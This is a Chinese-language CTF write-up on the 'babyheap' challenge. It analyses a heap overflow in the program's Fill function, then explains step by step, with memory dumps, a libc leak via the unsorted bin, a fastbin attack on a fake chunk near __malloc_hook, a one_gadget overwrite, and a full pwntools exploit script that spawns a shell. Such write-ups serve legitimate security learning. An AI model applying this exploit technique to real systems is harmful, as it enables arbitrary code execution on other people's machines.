过段时间没有输入则会显示Alarm clock,与sub_B70有关(调用alarm,nop掉)。
共有5个选项。
Allocate:可以分配0-15,总共16个chunk,大小不固定,最大不超过4096。从指定内存,每3个qword检查,flag是否为0(证明该index还未使用),如果是就把相关数据记录在此,否则顺序往后移3个qword。
使用calloc分配内存,calloc在动态分配完内存后,自动初始化该内存空间为零,而malloc不初始化,里边数据是随机的垃圾数据。
分配完,flag=1,记录长度和地址。譬如
依次存储flag、大小、地址
000019E2F87FF280 01 00 00 00 00 00 00 00 00 01 0000 00 00 00 00
000019E2F87FF290 10 90 C7 AB 09 56 00 00 01 00 00 00 00 00 00 00
000019E2F87FF2A0 20 00 00 00 00 00 00 00 20 91C7 AB 09 56 00 00
Fill:输入index,填充数据前检查flag是否为1,如果flag=1,才有后续操作。输入长度和内容。(没有将输入长度与分配内存大小做比较,有可能输入的内容超过内存大小)
sub_11B2(0x00005609ABC79120,6)
{
read(0,0x00005609ABC79120,6);
}
Dump:先检查对应的flag是否为1
sub_130F(0x00005609ABC79120, 0x20) //顶多输出整个chunk的内容,不会超边界读取
{
write(1,0x00005609ABC79120, 0x20);
}
delete:检查flag是否为1?如果flag=1,则free地址,之后将存在数组里的flag,size,地址清零。
sub_B70:根据/dev/urandom算出一个地址,用此地址作为存储各chunk相关信息的数组起始地址。
总结:所有操作前都会检查flag是否为1,因此UAF就别想了。删除时也没有任何问题,仅在Fill时没有校验输入长度和chunk长度之间的关系,可以造成堆溢出。
使用checksec检查该程序的安全机制
安全机制全开了。
利用思路:
1、首先要泄露libc基址。可以利用unsortedbin的fd和bk指向自身main_arena+88,从而计算libc基址。
2、拿到libc基址后,利用Fill功能存在的堆溢出,修改chunk的fd,向malloc_hook前的某个位置分配chunk,从而修改malloc_hook值
3、往malloc_hook里填入one_gadget,并触发。这次不能像以前一样修改got表了,因为开了Full RELRO。所谓 one_gadget 就是一个实现了直接执行system(‘/bin/sh’)的程序跳板。常见的,可以使用one_gadget覆盖劫持got表、返回地址、hook(__malloc_hook、__free_hook)等等操作,也就是当可以劫持控制流后覆盖的捷径
具体过程,下面尽可能列出每个步骤的详细截图,方便像我一样的小白清楚流程:
1、首先创建4个chunk
allocate(0x48)#0 a010 51
allocate(0x40)#1 a060 51
allocate(0x40)#2 a0b0 51
allocate(0x40)#3 a100 51
数组存储各chunk信息
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
2、修改chunk1的头部,使得chunk1的size=0xA1
update(0,0x49,'\x00'*0x48 + '\xa1')
修改前
000055C71CE7A000 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A050 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
修改后
000055C71CE7A000 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A010 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00
000055C71CE7A020 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00
000055C71CE7A030 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00
000055C71CE7A040 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00
000055C71CE7A050 00 00 00 00 0000 00 00 A10000 00 00 00 00 00
3、删除chunk1,让其放到unsorted
bin中
delete(1) a060 #chunk1放入unsortedbin
问:为什么会放入unsortedbin?
回答:如果刚刚释放的空间大于max_fast=64B(此时chunk1的size被改成A1了),那么会首先放到unsorted
bin中(只有一个,且为bins[1]),在下一次内存分配时,如果无法从fastbins中分配空间,那么会首先在这里寻找空间。
删前
000055C71CE7A050 00 00 00 00 00 00 00 00 A1 00 00 00 00 00 00 00
000055C71CE7A060 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A070 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A080 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A090 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A0A0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A0B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
删除后
000055C71CE7A050 00 00 00 00 00 00 00 00 A1 00 00 00 00 00 00 00
000055C71CE7A060 B8 B7 EE 38 0A 7F 00 00 B8 B7 EE 38 0A 7F 00 00
000055C71CE7A070 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A080 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A090 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A0A0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A0B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
4、申请大小为0x40的chunk,使得chunk2被移到unsortedbin
allocate(0x40) a060 #chunk2in unsordtedbin but flag==1
问:unsorted bin怎么从chunk1移动到了chunk2?
回答:如果unsortedbin中只有一个chunk,在分配时如果申请的nb大小比这个chunk小的话,会将这个chunk割一块刚好满足nb大小的小chunk出来给用户,然后将剩下的空间继续放在unsortedbin里,将其fd和bk都设置为unsortedbin地址。
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
000055C71CE7A050 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A060 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A070 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A080 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A090 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A0A0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A0B0 B8 B7EE 38 0A 7F 00 00 B8 B7 EE 38 0A 7F 0000
000055C71CE7A0C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
5、通过查看unsorted bin,泄露libc基址
view(2) a0b0
main_arena+88=0x7F0A38EEB7B8
libc_base=0x7F0A38EEB7B8-88-0x3c2760=0x7F0A38B29000
备注:0x3c2760是通过查看libc.so中malloc_trim函数确定的。每个libc版本的数值都不同,需要具体分析得出。0x3c2760是在我的调试环境ubuntu 14.04 64bit中的libc-2.19.so确定的,而该程序所带的libc.so.6中应为0x3c4b20。
6、创建chunk4
allocate(0x40) a0b0 #4clear unsortedbin place 2
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
000024B519199E70 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E80 B0 A0 E7 1C C7 55 00 00 00 00 00 00 00 0000 00
000055C71CE7A0A0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A0B0 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A0C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A0D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A0E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
7、修改chunk4
update(4,0x40,'a'*0x40) a0b0
000055C71CE7A0A0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A0B0 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0C0 61 61 61 61 6161 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0D0 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0E0 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0F0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
8、修改chunk2,即为chunk4
update(2,0x10,'b'*0x10) a0b0
000055C71CE7A0A0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A0B0 62 62 62 6262 62 62 62 62 62 62 62 62 62 62 62
000055C71CE7A0C0 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0D0 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0E0 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A0F0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
9、创建chunk5
allocate(0x60)#5 a150
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
000024B519199E70 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E80 B0 A0 E7 1C C7 55 00 00 01 0000 00 00 00 00 00
000024B519199E90 60 00 00 00 00 00 00 00 50 A1 E7 1C C7 55 00 00
000055C71CE7A140 00 00 00 00 00 00 00 00 71 00 00 00 00 00 00 00
000055C71CE7A150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A1A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10、删除chunk5,使得fastbin指向chunk5
delete(5) a150 # after delete, fastbins=chunk5
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
000024B519199E70 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E80 B0 A0 E7 1C C7 55 00 00 00 00 00 00 00 00 00 00
000024B519199E90 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00
11、选取合适的地址作为fake_chunk,修改chunk3的fd,使其指向fake_chunk
fake_chunk = leak_addr - 88 - 0x2b- 8=0x7F0A38EEB7B8-88-0x2b-8=7F0A38EEB72D
payload = 'a'*0x40 + p64(0) + p64(0x70) +p64(fake_chunk)
update(3,len(payload),payload) a100
为啥选择7F0A38EEB72D 作为fake_chunk?fastbin attack时候对要修改的fd是有要求的,不能随便取。
答复:因为0x7F0A38EEB72D+8为chunk的size字段所在的值,刚好此地值得数值为0x7f,我们需要在malloc_hook向上寻找是否可以错位出一个合法的 size 域。因为 0x7f 在计算 fastbin index 时,是属于 index 5 的,即 chunk 大小为 0x70 的。
为什么一定要选取chunk为70的?
答复:因为前面delete(5)就将chunk5放入了fastbins 0x70中。因此我们需要在malloc_hook上找出符合条件的size(0x70)。这样通过fastbin的fd指针将chunk5与fake_chunk通过单链表连接起来。
字节错位法:这种利用字节错位,提取出一个满足条件的size出来,以便分配chunk到这个地方。该方法多用于got表不能修改的情况。
这里可以发现在0x7fd7a4da9af5处开始的8个字节,可以抽出一个7f,当作size时就相当于0x70,符合我们fastbin的大小范围。因此把0x7fd7a4da9af5-8的地方作为fake_chunk的起始地址,覆盖某个chunk的fd。
原理:fd只要其size域是否属于该chunk就可以通过malloc检查。因此只要想写入的地址附近有属于该fastbin的size就可以让malloc分配到该位置。
如此选择一个合适的地址设为A,则chunk起始地址为A-8(pre size),usrdata(fd指针与之同体)部分为A+8,且上一个fd指向地址为A-8。
构造的xx大小-0x10,为malloc的参数,即返回的usrdata大小。
修改后,fd指向了7F0A38EEB72D
000055C71CE7A0F0 00 00 00 00 00 00 00 00 51 00 00 00 00 00 00 00
000055C71CE7A100 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A110 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A120 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A130 61 61 61 6161 61 61 61 61 61 61 61 61 61 61 61
000055C71CE7A140 00 00 00 0000 00 00 00 70 00 00 00 00 00 00 00
000055C71CE7A150 2D B7 EE 38 0A 7F 00 00 00 00 00 00 00 00 00 00
12、创建chunk,分配之前删除chunk5的地址
allocate(0x60) a150 #5
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
000024B519199E70 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E80 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E90 60 00 00 0000 00 00 00 50 A1 E7 1C C7 55 00 00
000055C71CE7A140 00 00 00 00 00 00 00 00 70 00 00 00 00 00 00 00
000055C71CE7A150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000055C71CE7A1A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
13、创建chunk6,分配地址为之前伪造的fake_chunk+0x10=00007F0A38EEB73D
allocate(0x60) #6 fake_chunk
000024B519199E10 01 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00
000024B519199E20 10 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E30 40 00 00 00 00 00 00 00 60 A0 E7 1C C7 55 00 00
000024B519199E40 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E50 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E60 40 00 00 00 00 00 00 00 00 A1 E7 1C C7 55 00 00
000024B519199E70 01 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
000024B519199E80 B0 A0 E7 1C C7 55 00 00 01 00 00 00 00 00 00 00
000024B519199E90 60 00 00 00 00 00 00 00 50 A1 E7 1C C7 55 00 00
000024B519199EA0 01 00 00 0000 00 00 00 60 00 00 00 00 00 00 00
000024B519199EB0 3D B7 EE 380A 7F 00 00 0000 00 00 00 00 00 00
14、修改chunk6,使得修改后__malloc_hook填充one_gadget地址
update(6,0x3+8,'c'*0x3+p64(one_gadget)) //修改后__malloc_hook填充了one_gadget地址
00007F0A38EEB73D位于__malloc_hook前3个字节的位置
libc_2.19.so:00007F0A38EEB73Ddb 0
libc_2.19.so:00007F0A38EEB73E db 0
libc_2.19.so:00007F0A38EEB73F db 0
libc_2.19.so:00007F0A38EEB740__malloc_hook db 0
libc_2.19.so:00007F0A38EEB741 db 0
libc_2.19.so:00007F0A38EEB742 db 0
libc_2.19.so:00007F0A38EEB743 db 0
libc_2.19.so:00007F0A38EEB744 db 0
libc_2.19.so:00007F0A38EEB745 db 0
运行one_gadget,列出了4个可用地址。这里我们选取0x4647c
one_gadget =libc_base +0x4647c=0x7F0A38B29000+0x4647c=7F0A38B6F47C
修改后,__malloc_hook填充了one_gadget地址7F0A38B6F47C
00007F0A38EEB730 60 CF BA 38 0A 7F 00 00 00 00 00 00 0063 63 63
00007F0A38EEB740 7C F4 B6 380A 7F 00 00 0000 00 00 00 00 00 00
15、在调用calloc时会调用malloc_hook中的函数地址7F0A38B6F47C,即为执行了execve("/bin/sh",rsp+0x30, environ)
alloc(10)
完整exp
from pwn import *
context.log_level='debug'
cn = process('./babyheap')
elf = ELF('./babyheap')
libc = ELF('./libc.so.6')
sl = lambda data :cn.sendline(str(data))
r = lambda numb=4096 :cn.recv(numb)
ru = lambda delims :cn.recvuntil(delims)
irt = lambda :cn.interactive()
uu64 = lambda data :u64(data.ljust(8, '\0'))
def allocate(size):
ru('Command: ')
sl(1)
ru('Size: ')
sl(size)
def update(index,size,content):
ru('Command: ')
sl(2)
ru('Index: ')
sl(index)
ru('Size: ')
sl(size)
ru('Content: ')
sl(content)
def delete(index):
ru('Command: ')
sl(3)
ru('Index: ')
sl(index)
def view(index):
ru('Command: ')
sl(4)
ru('Index: ')
sl(index)
allocate(0x48)#0
allocate(0x40)#1
allocate(0x40)#2
allocate(0x40)#3
update(0,0x49,'\x00'*0x48 + '\xa1')#change chunk1's size
delete(1) # chunk1 inunsortedbin
raw_input('delete chunk1')
gdb.attach(cn)
allocate(0x40)#chunk2 in unsordtedbin but flag==1
raw_input('create chunk1, chunk2 in unsortedbin')
gdb.attach(cn)
view(2)
ru('Content: \n')
leak_addr = uu64(r(6))
success('leak_addr:'+hex(leak_addr))
libc_base = leak_addr - 88-0x3c4b20
success('libc_base:'+hex(libc_base))
allocate(0x40)#4 clear unsortedbin place 2
update(4,0x40,'a'*0x40)
update(2,0x10,'b'*0x10)
#trim malloc_hook
allocate(0x60)#5
delete(5) # after delete,fastbins=chunk5
raw_input('delete chunk5')
gdb.attach(cn)
fake_chunk = leak_addr - 88 - 0x2b- 8
payload = 'a'*0x40 + p64(0) + p64(0x70) + p64(fake_chunk)
update(3,len(payload),payload)
allocate(0x60)#5 after created, fastbins changed to fake_chunk
raw_input('create chunk5')
gdb.attach(cn)
allocate(0x60) #6
one_gadget = libc_base + 0x4526a
success('one_gadget:'+hex(one_gadget))
update(6,0x13+8,'c'*0x13+p64(one_gadget))
raw_input('update chunk6 to one_gadget')
allocate(0x10)
'''
one_gadget libc.so.6
0x45216
0x4526a
0xf02a4
0xf1147
'''
irt()
本篇参考了下列文章
https://bbs.pediy.com/thread-247381.htm